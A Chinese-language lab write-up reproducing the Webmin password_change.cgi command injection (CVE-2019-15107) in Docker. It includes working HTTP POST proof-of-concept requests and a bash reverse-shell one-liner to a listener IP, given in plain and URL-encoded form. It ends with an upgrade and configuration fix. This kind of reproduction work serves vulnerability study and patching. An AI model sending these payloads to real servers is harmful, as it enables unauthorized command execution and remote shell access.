2. 程式人生 > 其它 >Webmin 遠端命令執行漏洞(CVE-2019-15107)

Webmin 遠端命令執行漏洞(CVE-2019-15107)

阿新 發佈:2022-05-18

Webmin是一個用於管理類Unix系統的管理配置工具,具有Web頁面。在其找回密碼頁面中,存在一處無需許可權的命令注入漏洞,通過這個漏洞攻擊者即可以執行任意系統命令。

參考連結:

漏洞概述

  • 漏洞編號:CVE-2019-15107
  • 漏洞描述:該漏洞允許惡意第三方在缺少輸入驗證的情況下而執行惡意程式碼
  • 該漏洞由於password_change.cgi檔案在重置密碼功能中存在一個程式碼執行漏洞,該漏洞允許惡意第三方在缺少輸入驗證的情況下而執行惡意程式碼
  • 漏洞利用條件:版本滿足要求,且伺服器的配置檔案允許修改密碼時,在不知道webmin的使用者和密碼條件下,可以任意執行程式碼

影響版本

Webmin <= 1.920

環境搭建

執行如下命令,啟動webmin 1.910:

docker-compose up -d

執行完成後,訪問https://your-ip:10000,忽略證書後即可看到webmin的登入頁面。

漏洞復現

docker ps -a檢視當前啟動的容器資訊
使用docker進入容器進行驗證 使用條件

docker exec -it 6d /bin/bash

這裡修改一下root密碼, 這樣就能進webmin中進行配置修改, 使用命令
passwd

利用修改的密碼登入

登入之後點選authentication修改密碼重置配置

在容器中使用
cat /etc/webmin/miniserv.conf 確認密碼策略正確

訪問/password_change.cgi連結,抓包注入命令

POC

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|ls&new1=test2&new2=test2

上面poc需要注意:ip改成自己的ip,然後user引數不能是系統賬戶,後面接執行的命令。

反彈Shell

bash -c "bash -i >& /dev/tcp/192.168.10.129/9999 0>&1"

對上面bash進行url編碼

傳送:

POST /password_change.cgi HTTP/1.1
Content-Length: 139
Host: 192.168.10.128:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://192.168.10.128:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 139

user=rootxx&pam=&expired=2&old=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.10.129%2F9999%200%3E%261%22&new1=test2&new2=test2

修復建議

目前Webmin官方已釋出最新版本Webmin 1.940 修復了該漏洞,請受影響的使用者儘快升級至最新版本:

下載連結:http://webmin.com/download.html

臨時解決方案:

1.900 到 1.920版本的使用者,編輯Webmin配置檔案:/etc/webmin/miniserv.conf,註釋或刪除“passwd_mode=”行,然後執行/etc/webmin/restart 重啟服務命令。

注:修復漏洞前請將資料備份,並進行充分測試。

相關推薦

Webmin 遠端命令執行漏洞CVE-2019-15107

Webmin是一個用於管理類Unix系統的管理配置工具,具有Web頁面。在其找回密碼頁面中,存在一處無需許可權的命令注入漏洞,通過這個漏洞攻擊者即可以執行任意系統命令

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2019-7238

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.14.0及之前版本中,存在一處基於OrientDB自定義函式的任意JEXL表示式執行功能,而這處功能存在未授權訪問漏洞,將可以

Spring Framework 遠端命令執行漏洞CVE-2022-22965

Spring Framework 遠端命令執行漏洞 CVE-2022-22965  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10199

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞

mongo-express 遠端程式碼執行漏洞CVE-2019-10758

mongo-express是一款mongodb的第三方Web介面,使用node和express開發。如果攻擊者可以成功登入,或者目標伺服器沒有修改預設的賬號密碼admin:pass,則可以執行任意node.js程式碼。

gitlist 0.6.0 遠端命令執行漏洞CVE-2018-1000533

gitlist是一款使用PHP開發的圖形化git倉庫檢視工具。在其0.6.0版本及以前,存在一處命令引數注入問題,可以導致遠端命令執行漏洞

GitLab 遠端命令執行漏洞CVE-2021-22205

GitLab是一款Ruby開發的Git專案管理平臺。在11.9以後的GitLab中,因為使用了圖片處理工具ExifTool而受到漏洞CVE-2021-22204的影響,攻擊者可以通過一個未授權的介面上傳一張惡意構造的圖片,進而在GitLab伺服器上執行

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10204

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞,這個漏洞CVE-2018-16621的繞過。

Weblogic未授權遠端命令執行漏洞CVE-2020-14882&CVE-2020-14883復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

Webmin 命令執行漏洞 CVE-2020-35606--- 復現

漏洞繞過針對 採取的措施 CVE-2019-12840 並將其轉換為新向量。 供應商尚未修復此漏洞

Webmin 命令執行漏洞 CVE-2020-35606---復現

CVE-Mitre 連結 下載 webmin_pu_escape_bypass_rce.rb (Metasploit) 漏洞簡介: 該模組利用 Webmin 1.962 及更低版本中的任意命令執行漏洞。 任何授權“包更新”模組的使用者都可以使用 root 許可權執行任意命令

企業安全06-Apache Log4j Server 反序列化命令執行漏洞CVE-2017-5645

CVE-2017-5645 Apache Log4j Server 反序列化命令執行漏洞(CVE-2017-5645 一、漏洞原理 Apache Log4j是一個用於Java的日誌記錄庫,其支援啟動遠端日誌伺服器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻

sql server 遠端訪問informix_微軟 SQL Server 遠端程式碼執行漏洞CVE-2020-0618

技術標籤:sql server 遠端訪問informix 漏洞描述 近日,微軟釋出了2月安全更新公告,其中CVE-2020-0618 SQL Server 遠端命令執行漏洞在國記憶體在危害,SQL Server 在國內使用量大。

Weblogic命令執行漏洞CVE-2018-2628復現

一、漏洞環境搭建 CVE-2018-2628影響的軟體版本為: Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2

關於Spring Cloud Gateway 遠端程式碼執行漏洞CVE-2022-22947的安全告知

Spring Cloud Gateway 是 Spring Cloud 下的一個專案,該專案是基於 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技術開發的閘道器,它旨在為微服務架構提供一種簡單有效統一的 API 路由管理方式。

漏洞通告】Apache Struts2遠端程式碼執行漏洞CVE-2021-31805

轉至:https://www.venustech.com.cn/new_type/aqtg/20220413/23713.html 0x00 漏洞概述 CVE   ID CVE-2021-31805

開源應用框架Spring Framework存在遠端程式碼執行漏洞CVE-2022-22965解決方案

監測發現,開源應用框架Spring Framework存在遠端程式碼執行漏洞(CVE-2022-22965。經分析研判,在JDKJava開發工具包9及以上版本環境中,或版本低於5.3.18和5.2.20的Spring框架及衍生框架構建的網站或應用中,

Spring Framework遠端程式碼執行漏洞CVE-2022-22965

一、漏洞描述 springframework 是spring 裡面的一個基礎開源框架,主要用於javaee的企業開發。

WordPress 4.6遠端程式碼執行漏洞CVE-2016-10033復現環境搭建指南

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞非外掛無需認證,附Poc,演示視訊——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建。

Imagetragick 命令執行漏洞CVE-2016–3714

ImageMagick是一款使用量很廣的圖片處理程式,很多廠商都呼叫了這個程式進行圖片處理,包括圖片的伸縮、切割、水印、格式轉換等等。但近來有研究者發現,當用戶傳入一個包含『畸形內容』的圖片的時候,就有可能觸發命